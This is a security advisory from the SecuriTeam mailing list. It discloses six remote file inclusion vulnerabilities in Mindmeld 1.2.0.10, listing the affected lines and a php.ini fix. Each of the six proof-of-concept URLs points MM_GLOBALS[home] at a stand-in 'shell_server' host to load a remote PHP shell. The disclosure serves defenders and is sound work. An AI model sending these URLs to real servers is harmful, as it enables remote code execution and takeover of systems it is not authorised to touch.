The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mindmeld Multiple File Inclusion Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://mindmeld.sourceforge.net/> Mindmeld is an, "enterprise-capable
knowledge-sharing system" written in PHP. There are multiple remote file
inclusion vulnerabilities in Mindmeld version 1.2.0.10 (latest version).
DETAILS
Vulnerable Systems:
* Mindmeld version 1.2.0.10
1. Vulnerable File and Line:
Mindmeld-1.2.0.10/acweb/admin_index.php: line 51
require_once ( $MM_GLOBALS['home']."include/utilities.inc" );
Proof of concept:
http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell_server/shell.php?
2. Vulnerable file and line:
Mindmeld-1.2.0.10/include/ask.inc.php: line 34
require_once ( $MM_GLOBALS['home'] . "interfaces
{$MM_GLOBALS['interface']}/include/" .
"interface_{$MM_GLOBALS['interface']}_ask.inc" );
Proof of concept:
http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?php?
3. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/learn.inc.php: line 38
require_once ( $MM_GLOBALS['home'] . "interfaces/
{$MM_GLOBALS['interface']}/include/"
Proof of concept:
http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?
4. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/manage.inc.php: line 31
require_once ( $MM_GLOBALS['home'] . "interfaces/
{$MM_GLOBALS['interface']}/include/"
Proof of concept:
http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?
5. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/mind.inc.php: line 33
require_once( $MM_GLOBALS['home'] . 'include/utilities.inc' );
Proof of concept:
http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?
6. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/sensory.inc.php: line 70
require_once ( $MM_GLOBALS['home'] . "include/utilities.inc" );
Proof of concept:
http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?
It appears that these vulnerabilities are not vulnerable to local file
includes.
Vendor status:
These vulnerabilities have been disclosed to the vendor although
development on this software has stopped.
Quick Fix:
In php.ini, disable the following variables: register_globals,
allow_url_fopen, and allow_url_include.
ADDITIONAL INFORMATION
The information has been provided by <mailto:security@davidwharton.us>
David Wharton.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
